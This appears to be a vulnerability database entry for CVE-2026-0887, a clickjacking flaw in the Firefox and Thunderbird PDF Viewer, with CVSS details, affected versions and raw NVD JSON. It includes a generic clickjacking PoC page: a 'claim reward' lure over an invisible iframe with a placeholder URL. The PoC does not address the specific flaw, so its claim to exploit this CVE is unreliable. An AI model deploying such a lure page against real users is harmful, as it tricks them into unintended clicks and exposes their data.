Security Vulnerability Report
CVE-2026-0887 CVSS 4.3 MEDIUM

Published: 2026-01-13 14:16:39
Last Modified: 2026-04-13 15:17:18

Description

Clickjacking issue, information disclosure in the PDF Viewer component. This vulnerability was fixed in Firefox 147, Firefox ESR 140.7, Thunderbird 147, and Thunderbird 140.7.

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:thunderbird:*:*:*:*:esr:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:thunderbird:*:*:*:*:-:*:*:* - VULNERABLE
Mozilla Firefox < 147
Mozilla Firefox ESR < 140.7
Mozilla Thunderbird < 147
Mozilla Thunderbird ESR < 140.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2026-0887 Clickjacking PoC -->
<!DOCTYPE html>
<html>
<head>
  <title>CVE-2026-0887 Clickjacking PoC</title>
  <style>
    body {
      font-family: Arial, sans-serif;
      background: #f0f0f0;
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
      margin: 0;
    }
    .container { text-align: center; }
    .click-bait {
      position: relative;
      z-index: 2;
      padding: 20px 40px;
      font-size: 18px;
      background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
      color: white;
      border: none;
      border-radius: 8px;
      cursor: pointer;
      box-shadow: 0 4px 15px rgba(0,0,0,0.2);
    }
    .click-bait:hover { transform: scale(1.05); }
    iframe {
      position: absolute;
      top: 0;
      left: 0;
      width: 100%;
      height: 100%;
      opacity: 0;
      z-index: 1;
      border: none;
    }
    .warning {
      color: #d32f2f;
      font-weight: bold;
      margin-bottom: 20px;
    }
  </style>
</head>
<body>
  <div class="container">
    <p class="warning">Educational PoC - For Security Research Only</p>
    <h2>Click here to claim your prize!</h2>
    <button class="click-bait">CLAIM REWARD</button>
    <!-- Hidden iframe targeting vulnerable PDF Viewer -->
    <!-- Replace URL with actual vulnerable Firefox/Thunderbird PDF Viewer URL -->
    <iframe src="https://vulnerable-site.com/pdf viewer URL"
            sandbox="allow-same-origin allow-scripts allow-forms">
    </iframe>
  </div>
  <script>
    // Log click events for demonstration
    document.querySelector('.click-bait').addEventListener('click', function() {
      console.log('Clickjacking attempt triggered');
      alert('This demonstrates how a hidden iframe can capture user clicks');
    });
  </script>
</body>
</html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-0887", "sourceIdentifier": "[email protected]", "published": "2026-01-13T14:16:39.240", "lastModified": "2026-04-13T15:17:17.927", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Clickjacking issue, information disclosure in the PDF Viewer component. This vulnerability was fixed in Firefox 147, Firefox ESR 140.7, Thunderbird 147, and Thunderbird 140.7."}, {"lang": "es", "value": "Problema de clickjacking, revelación de información en el componente Visor de PDF. Esta vulnerabilidad afecta a Firefox < 147, Firefox ESR < 140.7, Thunderbird < 147 y Thunderbird < 140.7."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-497"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:*", "versionEndExcluding": "140.7.0", "matchCriteriaId": "A2FC50B3-5A36-4702-8CF6-CC732E3B148B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:*", "versionEndExcluding": "147.0", "matchCriteriaId": "E06AF540-011D-4249-9815-3A4609DD26D1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:esr:*:*:*", "versionEndExcluding": "140.7.0", "matchCriteriaId": "BFBAB968-3244-4970-8D02-CCF9D5FB958D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:-:*:*:*", 
"versionEndExcluding": "147.0", "matchCriteriaId": "47B67C0A-B05F-4212-9255-0446302237A5"}]}]}], "references": [{"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=2006500", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-01/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-03/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-04/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-05/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}